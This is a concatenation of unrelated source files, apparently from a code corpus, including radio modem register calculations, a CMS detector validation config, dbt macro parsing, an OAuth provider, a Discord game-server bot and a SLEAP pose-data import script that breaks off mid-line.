preamble_pattern_len_actual = model.vars.preamble_pattern_len_actual.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if (preamble_detection_length >= 32) and not ber_force_fdm0: if ((preamble_pattern == 1) or (preamble_pattern==2)) and (preamble_pattern_len_actual == 2): # 1010 or 0101 repeating pro2_pm_pattern = 0 elif ((preamble_pattern == 1) and (preamble_pattern_len_actual == 1)) or ((preamble_pattern == 3) and (preamble_pattern_len_actual == 2)): # 1111 repeating pro2_pm_pattern = 1 elif (preamble_pattern == 0): # 0000 repeating pro2_pm_pattern = 2 else: # Any other sequence pro2_pm_pattern = 3 elif (preamble_detection_length >= 16) and not ber_force_fdm0: if ((preamble_pattern == 1) or (preamble_pattern==2)) and (preamble_pattern_len_actual == 2): # 1010 or 0101 repeating pro2_pm_pattern = 100 else: # Any other sequence pro2_pm_pattern = 150 else: #Any shorter sequence pro2_pm_pattern = 1000 # Load local variables back into model variables model.vars.pro2_pm_pattern.value = pro2_pm_pattern def calc_pro2_antdiv(self,model): # This function calculates the pro2 antenna diversity enable # Load model values into local variables antdivmode = model.vars.antdivmode.value if (antdivmode == 0): pro2_ant_div = 0 else: pro2_ant_div = 1 # Load local variables back into model variables model.vars.pro2_ant_div.value = pro2_ant_div def calc_pro2_fs_rx_ch(self,model): # This function calculates the Pro2 calculator input value for API_Fs_rx_CH # Load model values into local variables adc_freq_actual = model.vars.adc_freq_actual.value dec0_actual = model.vars.dec0_actual.value dec1_actual = model.vars.dec1_actual.value src2_actual = model.vars.src2_ratio_actual.value bcr_detector_en = model.vars.MODEM_PHDMODCTRL_BCRDETECTOR.value #Calculate a few more variables dec8 = 8 if bcr_detector_en: 
pro2_fs_rx_ch = int(adc_freq_actual*src2_actual/dec8/dec0_actual/dec1_actual)
        else:
            pro2_fs_rx_ch = int(adc_freq_actual/dec8/dec0_actual/dec1_actual)

        # Load local variables back into model variables
        model.vars.pro2_fs_rx_ch.value = pro2_fs_rx_ch

    def calc_bcr_demod_ksi3_and_phscale(self, model):
        # This function calculates the KSI3 value for the BCR demod

        # Load model values into local variables
        calculated_phscale = model.vars.MODEM_TRECPMDET_PHSCALE.value
        ksi3wb_actual = model.vars.ksi3wb.value

        model.vars.calculated_ksi3.value = int(round(ksi3wb_actual))
        model.vars.calculated_phscale.value = calculated_phscale

    def calc_bcr_demod_ook_pkd_thd(self, model):
        # This function calculates the OOK peak detector threshold

        # Load model values into local variables
        mod_type = model.vars.pro2_modulation_type.value
        shaping_filter_mode = model.vars.MODEM_CTRL0_SHAPING.value

        model.vars.calculated_bw_peak.value = 12
        if (shaping_filter_mode != 0) and (mod_type == 1):  ## OOK or ASK
            model.vars.calculated_bw_peak.value = 18

    def calc_bcr_invrxbit(self, model):
        # Reading variables from model variables
        fskmap = model.vars.MODEM_CTRL0_MAPFSK.value
        mod_type = model.vars.modulation_type.value

        # Assigning INVRXBIT the appropriate value based on existing FSKMAP variable
        if (mod_type == model.vars.modulation_type.var_enum.FSK2):
            invrxbit = fskmap
        else:
            invrxbit = 0

        self._reg_write(model.vars.MODEM_BCRDEMODCTRL_INVRXBIT, invrxbit)

    def calc_bcr_manchph(self, model):
        # Reading variables from model variables
        manchester_mapping = model.vars.manchester_mapping.value
        symbol_encoding = model.vars.symbol_encoding.value
        demod_select = model.vars.demod_select.value

        # Assigning MANCHPH the appropriate value based on existing symbol encoding and manchester mapping
        if (symbol_encoding == model.vars.symbol_encoding.var_enum.Inv_Manchester) and (demod_select == model.vars.demod_select.var_enum.BCR):
            manchph = 1
        else:
            manchph = 0

        self._reg_write(model.vars.MODEM_BCRDEMODCTRL_MANCHPH, manchph)

    def calc_eyeopenthd_reg(self, model):
        phscale = model.vars.phscale_actual.value
        ksi3 = model.vars.calculated_ksi3.value
        demod_select = model.vars.demod_select.value

        if (demod_select == model.vars.demod_select.var_enum.BCR):
            eyeopenthd = int(4 * ksi3 * phscale)
        else:
            eyeopenthd = 0

        self._reg_write(model.vars.MODEM_BCRDEMODARR1_EYEOPENTHD, eyeopenthd)

    def calc_bbpmdeten_arrqpm(self, model):
        # Reading variables from model variables
        encfequal_actual = model.vars.MODEM_BCRDEMODARR1_ENCFEQUAL.value
        demod_select = model.vars.demod_select.value
        en2TB_est = model.vars.MODEM_BCRDEMODAFC0_EN2TBEST.value
        estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value

        if (encfequal_actual == 1) and (demod_select == model.vars.demod_select.var_enum.BCR):
            # : Based on 2FSK low modulation index and preamble len < 48 investigation
            # : Floor issue is resolved by disabling BBPMDET mode and using BT preamble detection mode.
# : https://jira.silabs.com/browse/MCUW_RADIO_CFG-1440
            if en2TB_est == 0:
                self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 1)
            else:
                self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 0)
            self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRQPM, 1)
        else:
            self._reg_write(model.vars.MODEM_BCRDEMODARR0_ARRQPM, 0)
            self._reg_write(model.vars.MODEM_BCRDEMODCTRL_BBPMDETEN, 0)

    def calc_freq_dev_min(self, model):
        # Reading variables from model variables
        fdeverror = model.vars.deviation_tol_ppm.value
        deviation = model.vars.deviation.value

        freq_dev_min = int(deviation - (fdeverror * deviation) / 1000000)
        model.vars.freq_dev_min.value = freq_dev_min

    def calc_freq_dev_max(self, model):
        # Reading variables from model variables
        fdeverror = model.vars.deviation_tol_ppm.value
        deviation = model.vars.deviation.value

        freq_dev_max = int(deviation + (fdeverror * deviation) / 1000000)
        model.vars.freq_dev_max.value = freq_dev_max

    def calc_bcr_cfe_costthd(self, model):
        antdivmode = model.vars.antdivmode.value

        if model.vars.bcr_demod_en.value == 1:
            # Need to read in these variables inside of the if statement as some are don't care if BCR disabled
            calculated_bcrpmacqwin = model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN.value
            if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1:
                bcr_cfe_costthd = 150  # If antdiv enabled, bcrpmacqwin is always 2 so the cost thd is constant.
            else:
                bcr_cfe_costthd = int(round(215 - (3 - calculated_bcrpmacqwin) * 60))
        else:
            bcr_cfe_costthd = 255

        self._reg_sat_write(model.vars.MODEM_BCRDEMODPMEXP_BCRCFECOSTTHD, bcr_cfe_costthd)  # We always care about this

    def calc_bcr_symbwmax(self, model):
        pro2_dsa_en = model.vars.pro2_dsa_mode.value
        estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value
        bcr_osr_actual = model.vars.MODEM_BCRCTRL1_BCROSR.value
        bcr_osr_trunc = bcr_osr_actual >> 6

        if pro2_dsa_en == 0:
            symbwmin = 0
            symbwmax = 31
        elif bcr_osr_trunc == 0:
            # : for low BCR OSR, keep short symbol width
            symbwmax = 4
            symbwmin = 1
        else:
            # : Ensure that the mbus case with long preamble has a long symbwmax
            if estosren_actual == 1:
                symbwmax = 8
                symbwmin = 2
            else:
                # : Based on 2-FSK with estosren disabled test, symbwmax needs to be set lower to reduce floor near AGC
                # : adjustment region (floor around -50 dBm)
                symbwmax = 6
                symbwmin = 2

        if model.vars.bcr_demod_en.value == 1:
            self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN, symbwmin)
            self._reg_write(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX, symbwmax)
        else:
            self._reg_do_not_care(model.vars.MODEM_BCRDEMODARR1_SYMBWMIN)
            self._reg_do_not_care(model.vars.MODEM_BCRDEMODARR1_SYMBWMAX)

    def calc_bcr_cfeschwin(self, model):
        preamble_detection_length = model.vars.preamble_detection_length.value
        estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value
        ber_force_fdm0 = model.vars.ber_force_fdm0.value

        if (preamble_detection_length < 32) or ber_force_fdm0:
            # : for short preamble, keep CFE window short
            bcrcfeschwin = 3
        elif 32 <= preamble_detection_length < 40:
            if estosren_actual == 1:
                # : For mbus case with long preamble, keep CFE window short
                bcrcfeschwin = 3
            else:
                # : Based on 2-FSK with estosren disabled test, keep CFE window long to reduce floor near AGC
                # : adjustment region (floor around -50 dBm).
bcrcfeschwin = 4 else: # : for long preamble, keep CFE window long bcrcfeschwin = 4 if model.vars.bcr_demod_en.value == 1: self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN, bcrcfeschwin) else: self._reg_do_not_care(model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN) def calc_bcr_cfequalthd(self, model): if model.vars.bcr_demod_en.value == 1: #Need to read this model variable inside the if statement as it may be set to dont care if BCR disabled bcrcfeschwin_actual = model.vars.MODEM_BCRDEMODPMEXP_BCRCFESCHWIN.value # : zero crossing qualified threshold is recommended by Wentao to be set as CFE window minus 1 if bcrcfeschwin_actual > 0: cfequalthd = bcrcfeschwin_actual - 1 else: cfequalthd = 0 else: cfequalthd = 7 self._reg_write(model.vars.MODEM_BCRDEMODARR1_CFEQUALTHD, cfequalthd) #We always care about this field def calc_bcr_pmacqwin(self, model): preamble_detection_length = model.vars.preamble_detection_length.value estosren_actual = model.vars.MODEM_BCRCTRL1_ESTOSREN.value antdivmode = model.vars.antdivmode.value ber_force_fdm0 = model.vars.ber_force_fdm0.value if antdivmode == model.vars.antdivmode.var_enum.PHDEMODANTDIV or antdivmode == model.vars.antdivmode.var_enum.ANTENNA1: pmacqwin = 2 # : If antdiv mode enabled, keep window short so that shorter preamble length can be used elif (preamble_detection_length < 32) or ber_force_fdm0: # : for short preamble, keep preamble window short pmacqwin = 2 elif 32 <= preamble_detection_length < 40: if estosren_actual == 1: pmacqwin = 2 else: pmacqwin = 3 else: pmacqwin = 3 if model.vars.bcr_demod_en.value == 1: self._reg_write(model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN, pmacqwin) else: self._reg_do_not_care(model.vars.MODEM_BCRDEMODPMEXP_BCRPMACQWIN) def calc_bcrdemodook_noiseflest_abpk_regs(self, model): #This function programs the BCRDEMODOOK_NOISEFLEST and BCRDEMODOOK_ABPK fields #Read in model variables modulation_type = model.vars.modulation_type.value preamble_detection_length = model.vars.preamble_detection_length.value #Set the register value based on mod type and preamble length if (modulation_type == model.vars.modulation_type.var_enum.OOK or modulation_type == model.vars.modulation_type.var_enum.ASK) and preamble_detection_length < 20: #OOK with short preamble case noiseflest = 1 abpk = 4 else: noiseflest = 0 abpk = 0 #Write the register self._reg_write(model.vars.MODEM_BCRDEMODOOK_NOISEFLEST, noiseflest) self._reg_write(model.vars.MODEM_BCRDEMODOOK_ABPK, abpk)
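    # Worked example for calc_freq_dev_min / calc_freq_dev_max above
    # (illustrative numbers, not taken from a real PHY configuration):
    # with deviation = 50_000 Hz and deviation_tol_ppm = 1_000, the tolerated
    # range is 50_000 ± (1_000 * 50_000) / 1_000_000 = 50_000 ± 50 Hz,
    # so freq_dev_min = 49_950 and freq_dev_max = 50_050.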
11589525
def diff_brute(n, l):
    """Counts unordered pairs in l whose absolute difference is n. Runtime: O(n^2)"""
    count = 0
    for c1, i in enumerate(l):
        for c2, j in enumerate(l):
            if abs(i-j) == n and c1 != c2:
                count += 1
    return count // 2  # every unordered pair was counted once per direction


def diff(n, l):
    """
    Counts unordered pairs in l whose difference is n, using a hash map. Runtime: O(n)
    """
    occurrences = {}
    count = 0
    for i in l:
        if i in occurrences:
            occurrences[i] += 1
        else:
            occurrences[i] = 1
    for i in occurrences:
        if i + n in occurrences:
            c1 = occurrences[i]
            c2 = occurrences[i + n]
            count += c1 * c2
    return count


print(diff(4, [1, 1, 5, 6, 9, 16, 27]))  # 3 (due to 2x [1, 5], and [5, 9])
print(diff(2, [1, 1, 3, 3]))  # 4 (due to 4x [1, 3])
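# Sanity sketch (added illustration, not in the original file): for any n >= 1
# the hash-map version should agree with the O(n^2) brute force.
import random

for _ in range(100):
    xs = [random.randint(0, 9) for _ in range(30)]
    k = random.randint(1, 5)
    assert diff(k, xs) == diff_brute(k, xs), (k, xs)
print('diff and diff_brute agree on random inputs')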
11589560
import FWCore.ParameterSet.Config as cms class config: pass config.runNumber = 1 config.refTag = 'DT_t0_cosmic2009_V01_express' config.t0DB = 't0.db' config.dataset = '/MiniDaq/Run2011A-v1/RAW' config.outputdir = 'DQM' config.trial = 1 # Further config. dataset_vec = config.dataset.split('/') config.workflowName = '/%s/%s-dtT0DBValidation-rev%d/%s' % (dataset_vec[1], dataset_vec[2], config.trial, dataset_vec[3]) process = cms.Process("DBValidation") process.MessageLogger = cms.Service("MessageLogger", debugModules = cms.untracked.vstring('dtT0Analyzer'), cerr = cms.untracked.PSet( default = cms.untracked.PSet( limit = cms.untracked.int32(0) ), InterChannelSynchDBValidation = cms.untracked.PSet( limit = cms.untracked.int32(10000000) ), threshold = cms.untracked.string('DEBUG'), DEBUG = cms.untracked.PSet( limit = cms.untracked.int32(0) ) ), categories = cms.untracked.vstring('InterChannelSynchDBValidation'), destinations = cms.untracked.vstring('cerr') ) process.load("Configuration.StandardSequences.GeometryRecoDB_cff") process.load("Geometry.DTGeometry.dtGeometry_cfi") process.DTGeometryESModule.applyAlignment = False process.load("DQMServices.Core.DQM_cfg") process.load("DQMServices.Components.DQMEnvironment_cfi") process.source = cms.Source("EmptySource", numberEventsInRun = cms.untracked.uint32(1), firstRun = cms.untracked.uint32(config.runNumber) ) process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) ) process.tzeroRef = cms.ESSource("PoolDBESSource", DBParameters = cms.PSet( messageLevel = cms.untracked.int32(0), authenticationPath = cms.untracked.string('/afs/cern.ch/cms/DB/conddb') ), timetype = cms.string('runnumber'), connect = cms.string('oracle://cms_orcoff_prod/CMS_COND_31X_DT'), toGet = cms.VPSet( cms.PSet( record = cms.string('DTT0Rcd'), tag = cms.string(config.refTag), label = cms.untracked.string('tzeroRef') ), cms.PSet( record = cms.string('DTT0Rcd'), tag = cms.string('t0'), connect = cms.untracked.string('sqlite_file:%s' % config.t0DB), label = cms.untracked.string('tzeroToValidate') ) ), siteLocalConfig = cms.untracked.bool(False) ) process.dtT0Analyzer = cms.EDAnalyzer("DTt0DBValidation", labelDBRef = cms.string('tzeroRef'), labelDB = cms.string('tzeroToValidate'), t0TestName = cms.string('t0DifferenceInRange'), #OutputFileName = cms.untracked.string('t0DBValidation_DT_t0_cosmic2009_V01_express.root') ) from DQMServices.Core.DQMQualityTester import DQMQualityTester process.qTester = DQMQualityTester( prescaleFactor = cms.untracked.int32(1), reportThreshold = cms.untracked.string('black'), qtList = cms.untracked.FileInPath('DQMOffline/CalibMuon/data/QualityTests.xml') ) process.dqmSaver.convention = 'Offline' process.dqmSaver.workflow = config.workflowName process.DQM.collectorHost = '' #process.p = cms.Path(process.dtT0Analyzer*process.qTester*process.dqmSaver) process.p = cms.Path(process.qTester* process.dtT0Analyzer* process.dqmSaver)
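# Worked example of the workflow name composed above: '/MiniDaq/Run2011A-v1/RAW'
# splits into ['', 'MiniDaq', 'Run2011A-v1', 'RAW'], so with trial = 1 the
# resulting workflowName is '/MiniDaq/Run2011A-v1-dtT0DBValidation-rev1/RAW'.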
11589562
import jinja2 from dbt.clients.jinja import get_environment from dbt.exceptions import raise_compiler_error def statically_extract_macro_calls(string, ctx, db_wrapper=None): # set 'capture_macros' to capture undefined env = get_environment(None, capture_macros=True) parsed = env.parse(string) standard_calls = ['source', 'ref', 'config'] possible_macro_calls = [] for func_call in parsed.find_all(jinja2.nodes.Call): func_name = None if hasattr(func_call, 'node') and hasattr(func_call.node, 'name'): func_name = func_call.node.name else: # func_call for dbt_utils.current_timestamp macro # Call( # node=Getattr( # node=Name( # name='dbt_utils', # ctx='load' # ), # attr='current_timestamp', # ctx='load # ), # args=[], # kwargs=[], # dyn_args=None, # dyn_kwargs=None # ) if (hasattr(func_call, 'node') and hasattr(func_call.node, 'node') and type(func_call.node.node).__name__ == 'Name' and hasattr(func_call.node, 'attr')): package_name = func_call.node.node.name macro_name = func_call.node.attr if package_name == 'adapter': if macro_name == 'dispatch': ad_macro_calls = statically_parse_adapter_dispatch( func_call, ctx, db_wrapper) possible_macro_calls.extend(ad_macro_calls) else: # This skips calls such as adapter.parse_index continue else: func_name = f'{package_name}.{macro_name}' else: continue if not func_name: continue if func_name in standard_calls: continue elif ctx.get(func_name): continue else: if func_name not in possible_macro_calls: possible_macro_calls.append(func_name) return possible_macro_calls # Call( # node=Getattr( # node=Name( # name='adapter', # ctx='load' # ), # attr='dispatch', # ctx='load' # ), # args=[ # Const(value='test_pkg_and_dispatch') # ], # kwargs=[ # Keyword( # key='packages', # value=Call(node=Getattr(node=Name(name='local_utils', ctx='load'), # attr='_get_utils_namespaces', ctx='load'), args=[], kwargs=[], # dyn_args=None, dyn_kwargs=None) # ) # ], # dyn_args=None, # dyn_kwargs=None # ) def statically_parse_adapter_dispatch(func_call, ctx, db_wrapper): possible_macro_calls = [] # This captures an adapter.dispatch('<macro_name>') call. 
func_name = None # macro_name positional argument if len(func_call.args) > 0: func_name = func_call.args[0].value if func_name: possible_macro_calls.append(func_name) # packages positional argument macro_namespace = None packages_arg = None packages_arg_type = None if len(func_call.args) > 1: packages_arg = func_call.args[1] # This can be a List or a Call packages_arg_type = type(func_call.args[1]).__name__ # keyword arguments if func_call.kwargs: for kwarg in func_call.kwargs: if kwarg.key == 'macro_name': # This will remain to enable static resolution if type(kwarg.value).__name__ == 'Const': func_name = kwarg.value.value possible_macro_calls.append(func_name) else: raise_compiler_error(f"The macro_name parameter ({kwarg.value.value}) " "to adapter.dispatch was not a string") elif kwarg.key == 'macro_namespace': # This will remain to enable static resolution kwarg_type = type(kwarg.value).__name__ if kwarg_type == 'Const': macro_namespace = kwarg.value.value else: raise_compiler_error("The macro_namespace parameter to adapter.dispatch " f"is a {kwarg_type}, not a string") # positional arguments if packages_arg: if packages_arg_type == 'List': # This will remain to enable static resolution packages = [] for item in packages_arg.items: packages.append(item.value) elif packages_arg_type == 'Const': # This will remain to enable static resolution macro_namespace = packages_arg.value if db_wrapper: macro = db_wrapper.dispatch( func_name, macro_namespace=macro_namespace ).macro func_name = f'{macro.package_name}.{macro.name}' possible_macro_calls.append(func_name) else: # this is only for test/unit/test_macro_calls.py if macro_namespace: packages = [macro_namespace] else: packages = [] for package_name in packages: possible_macro_calls.append(f'{package_name}.{func_name}') return possible_macro_calls
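# Minimal sketch (added illustration, not part of dbt): how the AST walk above
# sees plain and namespaced calls in a template string, using vanilla jinja2.
if __name__ == '__main__':
    tree = jinja2.Environment().parse(
        "{{ ref('my_model') }} {{ dbt_utils.current_timestamp() }}"
    )
    for call in tree.find_all(jinja2.nodes.Call):
        node = call.node
        if isinstance(node, jinja2.nodes.Name):
            print(node.name)  # -> ref
        elif isinstance(node, jinja2.nodes.Getattr):
            print(f'{node.node.name}.{node.attr}')  # -> dbt_utils.current_timestamp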
11589578
from allauth.socialaccount.providers.base import ProviderAccount from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider class AgaveAccount(ProviderAccount): def get_profile_url(self): return self.account.extra_data.get("web_url", "dflt") def get_avatar_url(self): return self.account.extra_data.get("avatar_url", "dflt") def to_str(self): dflt = super(AgaveAccount, self).to_str() return self.account.extra_data.get("name", dflt) class AgaveProvider(OAuth2Provider): id = "agave" name = "Agave" account_class = AgaveAccount def extract_uid(self, data): return str(data.get("create_time")) def extract_common_fields(self, data): return dict( email=data.get("email"), username=data.get("username", ""), name=( (data.get("first_name", "") + " " + data.get("last_name", "")).strip() ), ) def get_default_scope(self): scope = ["PRODUCTION"] return scope provider_classes = [AgaveProvider]
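# Illustration with a hypothetical profile payload (field names assumed for the
# example, not taken from the Agave API documentation):
#   provider.extract_common_fields({"email": "ada@example.org", "username": "ada",
#                                   "first_name": "Ada", "last_name": "Lovelace"})
#   -> {"email": "ada@example.org", "username": "ada", "name": "Ada Lovelace"}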
11589593
from typing import Optional import typer __version__ = "0.1.0" def version_callback(value: bool): if value: typer.echo(f"Awesome CLI Version: {__version__}") raise typer.Exit() def main( name: str = typer.Option("World"), version: Optional[bool] = typer.Option( None, "--version", callback=version_callback ), ): typer.echo(f"Hello {name}") if __name__ == "__main__": typer.run(main)
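# Example invocations (assuming this file is saved as main.py):
#   $ python main.py                 -> Hello World
#   $ python main.py --name Camila   -> Hello Camila
#   $ python main.py --version       -> Awesome CLI Version: 0.1.0, then the
#                                       callback exits via typer.Exit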
11589607
from . import monkey # noqa # Sometimes noqa does not disable linter (Spyder IDE) monkey.__package__ from .executors import TaskPool from .scheduler import ( # Scheduler, PersistentScheduler, )
11589641
from pycompat import * from qtutil import * from audioLibs.base import Song try: from PyQt4.phonon import Phonon except ImportError: try: from PyQt5.phonon import Phonon except ImportError: try: from PySide.phonon import Phonon except ImportError: from PySide2.phonon import Phonon class PhononSong(Song): # fallback for when pyglet doesn't work def __init__(self, path): super(PhononSong, self).__init__(path) self.player = Phonon.MediaObject() self.output = Phonon.AudioOutput(Phonon.MusicCategory, None) Phonon.createPath(self.player, self.output) self.song = Phonon.MediaSource(path) self.player.setCurrentSource(self.song) self.tick = None self.player.stateChanged.connect(self.__doSeek) def __doSeek(self, state, __s): if self.tick is None: return if state == Phonon.PlayingState: self.player.seek(self.tick) self.tick = None def seekAndPlay(self, seconds): self.player.play() # seek silently fails if we're still buffering or loading # so let's store what to seek for later if that's the case if self.player.state() != Phonon.PlayingState: self.tick = long(seconds * 1000) return self.player.seek(long(seconds * 1000)) def stop(self): self.player.stop()
11589687
import asyncio import datetime import hashlib import logging import re import textwrap import discord from carim_discord_bot import managed_service, config from carim_discord_bot.discord_client import client from carim_discord_bot.managed_service import Message log = logging.getLogger(__name__) class PlayerCount(managed_service.Message): def __init__(self, server_name, players, slots, queue, time): super().__init__(server_name) self.players = players self.slots = slots self.queue = queue self.time = time class Chat(managed_service.Message): def __init__(self, server_name, content): super().__init__(server_name) self.content = content class Log(managed_service.Message): def __init__(self, server_name, text): super().__init__(server_name) self.text = text class Response(managed_service.Message): def __init__(self, server_name, text): super().__init__(server_name) self.text = text class UserResponse(managed_service.Message): def __init__(self, channel_id, title, text): super().__init__(None) self.channel_id = channel_id self.title = title self.text = text def get_server_color(server_name): color_options = [ 0x9c27b0, 0x3f51b5, 0x2196f3, 0x03a9f4, 0x00bcd4, 0x009688, 0x4caf50, 0x8bc34a, 0xcddc39, 0xffeb3b, 0xffc107, 0xff9800, 0x795548, 0x607d8b ] return color_options[ int.from_bytes(hashlib.sha256(bytes(server_name, encoding='utf-8')).digest()[-4:], 'big') % len( color_options)] def build_fields(server_name, rolled_up_log, formatted=False): messages = [] fields = [] current_field = { 'name': f'**{server_name}**', 'value': '```\n' if formatted else '' } validated_log = [] for log_line in rolled_up_log: validated_log += textwrap.wrap(log_line, 1000) for log_line in validated_log: if sum(get_field_length(f) for f in fields) > 4096: messages.append(fields) fields = [] if not current_field['value'] == '' and get_field_length(current_field) + len(log_line) > 1000: current_field['value'] += '```' fields.append(current_field) current_field = { 'name': f'{server_name}' if formatted else f'**{server_name}**', 'value': '```\n' if formatted else '' } current_field['value'] += log_line + '\n' current_field['value'] += '```' fields.append(current_field) messages.append(fields) return messages def build_formatted_fields(server_name, rolled_up_log): return build_fields(server_name, rolled_up_log, formatted=True) def get_field_length(field): return len(field.get('name', '') + field.get('value', '')) class DiscordService(managed_service.ManagedService): def __init__(self): super().__init__() self.client = None self.log_rollup = {name: list() for name in config.get_server_names()} start_date = datetime.datetime.now().replace(minute=max(0, datetime.datetime.now().minute - 3)) self.last_log_time = {name: start_date for name in config.get_server_names()} self.last_player_count_update = {name: start_date for name in config.get_server_names()} self.player_counts = {name: '' for name in config.get_server_names()} async def stop(self): await self.client.close() sleep_length = 30 log.info(f'sleeping for {sleep_length} seconds') await asyncio.sleep(sleep_length) await super().stop() async def service(self): self.client = client.CarimClient() await self.client.login(config.get().token) asyncio.create_task(self.client.connect()) await self.set_presence() while True: await asyncio.sleep(1) await self.flush_log() async def set_presence(self): if config.get().presence is not None and len(config.get().presence) > 0: if config.get().presence_type == 'watching': activity_type = discord.ActivityType.watching elif 
config.get().presence_type == 'listening': activity_type = discord.ActivityType.listening else: activity_type = discord.ActivityType.playing activity = discord.Activity(type=activity_type, name=config.get().presence) else: activity = None await self.client.wait_until_ready() await self.client.change_presence(activity=activity) async def handle_message(self, message: Message): await self.client.wait_until_ready() if isinstance(message, PlayerCount): await self.handle_player_count_message(message) elif isinstance(message, Log): log.info(f'log {message.server_name}: {message.text}') self.log_rollup[message.server_name] += f'{message.text}'.split('\n') elif isinstance(message, Response): log.info(f'response {message.server_name}: {message.text}') self.log_rollup[message.server_name] += f'{message.text}'.split('\n') elif isinstance(message, Chat): log.info(f'chat {message.server_name}: {message.content}') channel_id = config.get_server(message.server_name).chat_channel_id if channel_id: if config.get_server(message.server_name).chat_ignore_regex: r = re.compile(config.get_server(message.server_name).chat_ignore_regex) if r.match(message.content): log.info(f'chat ignored {message.server_name}: {message.content}') return channel: discord.TextChannel = self.client.get_channel(channel_id) await channel.send(embed=discord.Embed(description=message.content)) elif isinstance(message, UserResponse): log.info(f'user message {message.channel_id}: {message.text}') channel: discord.TextChannel = self.client.get_channel(message.channel_id) for m in build_formatted_fields(message.title, message.text.split('\n')): embed_dict = { 'color': get_server_color(message.title), 'fields': m } await channel.send(embed=discord.Embed.from_dict(embed_dict)) async def handle_player_count_message(self, message: PlayerCount): if config.get_server(message.server_name).player_count_channel_id: player_count_string = config.get_server(message.server_name).player_count_format.format( players=message.players, slots=message.slots, queue=message.queue, time=message.time) if message.queue != '0': player_count_string += config.get_server(message.server_name).player_count_queue_format.format( players=message.players, slots=message.slots, queue=message.queue, time=message.time ) if self.player_counts[message.server_name] != player_count_string: if datetime.timedelta(minutes=6) < \ datetime.datetime.now() - self.last_player_count_update[message.server_name]: # Rate limit is triggered when updating a channel name too often, so that's why we # put a hard limit on how often the player count channel gets updated channel: discord.TextChannel = self.client.get_channel( config.get_server(message.server_name).player_count_channel_id) await channel.edit(name=player_count_string) self.last_player_count_update[message.server_name] = datetime.datetime.now() self.player_counts[message.server_name] = player_count_string log.info(f'log {message.server_name}: Update player count: {player_count_string}') if config.get().log_player_count_updates: self.log_rollup[message.server_name].append(f'Update player count: {player_count_string}') async def flush_log(self): await self.client.wait_until_ready() for server_name in config.get_server_names(): if self.log_rollup[server_name] and datetime.timedelta(seconds=10) < \ datetime.datetime.now() - self.last_log_time[server_name]: for message in build_fields(server_name, self.log_rollup[server_name]): await self.send_rolled_log(server_name, message) self.last_log_time[server_name] = datetime.datetime.now() 
self.log_rollup[server_name] = list() async def send_rolled_log(self, server_name, fields): channel: discord.TextChannel = self.client.get_channel( config.get_server(server_name).admin_channel_id) embed_dict = { 'color': get_server_color(server_name), 'fields': fields } await channel.send(embed=discord.Embed.from_dict(embed_dict)) service = None def get_service_manager(): global service if service is None: service = DiscordService() return service
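if __name__ == '__main__':
    # Minimal sketch (added illustration): the embed color picked for a server
    # name is deterministic, and build_fields chunks long logs into embed-sized
    # fields of at most ~1000 characters each.
    assert get_server_color('alpha') == get_server_color('alpha')
    messages = build_fields('alpha', [f'log line {i}' for i in range(200)])
    print(f'{len(messages)} message(s), {len(messages[0])} field(s) in the first')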
11589716
import h5py import pandas as pd import json import cv2 import os, glob from pylab import * import numpy as np import operator from functools import reduce from configparser import ConfigParser, MissingSectionHeaderError, NoOptionError import errno import simba.rw_dfs #def importSLEAPbottomUP(inifile, dataFolder, currIDList): data_folder = r'Z:\DeepLabCut\DLC_extract\Troubleshooting\Sleap_h5\import_folder' configFile = str(r"Z:\DeepLabCut\DLC_extract\Troubleshooting\Sleap_h5\project_folder\project_config.ini") config = ConfigParser() try: config.read(configFile) except MissingSectionHeaderError: print('ERROR: Not a valid project_config file. Please check the project_config.ini path.') projectPath = config.get('General settings', 'project_path') animalIDs = config.get('Multi animal IDs', 'id_list') currIDList = animalIDs.split(",") currIDList = [x.strip(' ') for x in currIDList] filesFound = glob.glob(data_folder + '/*.analysis.h5') videoFolder = os.path.join(projectPath, 'videos') outputDfFolder = os.path.join(projectPath, 'csv', 'input_csv') try: wfileType = config.get('General settings', 'workflow_file_type') except NoOptionError: wfileType = 'csv' animalsNo = len(currIDList) bpNamesCSVPath = os.path.join(projectPath, 'logs', 'measures', 'pose_configs', 'bp_names', 'project_bp_names.csv') poseEstimationSetting = config.get('create ensemble settings', 'pose_estimation_body_parts') print('Converting sleap h5 into dataframes...') csvPaths = [] for filename in filesFound: video_save_name = os.path.basename(filename).replace('analysis.h5', wfileType) savePath = os.path.join(outputDfFolder, video_save_name) bpNames, orderVarList, OrderedBpList, MultiIndexCol, dfHeader, csvFilesFound, xy_heads, bp_cord_names, bpNameList, projBpNameList = [], [], [], [], [], [], [], [], [], [] print('Processing ' + str(os.path.basename(filename)) + '...') hf = h5py.File(filename, 'r') bp_name_list, track_list, = [], [], for bp in hf.get('node_names'): bp_name_list.append(bp.decode('UTF-8')) for track in hf.get('track_names'): track_list.append(track.decode('UTF-8')) track_occupancy = hf.get('track_occupancy') with track_occupancy.astype('int16'): track_occupancy = track_occupancy[:] tracks = hf.get('tracks') with tracks.astype('int16'): tracks = tracks[:] frames = tracks.shape[3] animal_df_list = [] for animals in range(len(track_list)): animal_x_array, animal_y_array = np.transpose(tracks[animals][0]), np.transpose(tracks[animals][1]) animal_p_array = np.zeros(animal_x_array.shape) animal_array = np.ravel([animal_x_array, animal_y_array, animal_p_array], order="F").reshape(frames, len(bp_name_list) * 3) animal_df_list.append(pd.DataFrame(animal_array)) video_df = pd.concat(animal_df_list, axis=1) for animal in range(len(currIDList)): for bp in bp_name_list: colName1, colName2, colName3 = str('Animal_' + str(animal+1) + '_' + bp + '_x'), ('Animal_' + str(animal+1) + '_' + bp + 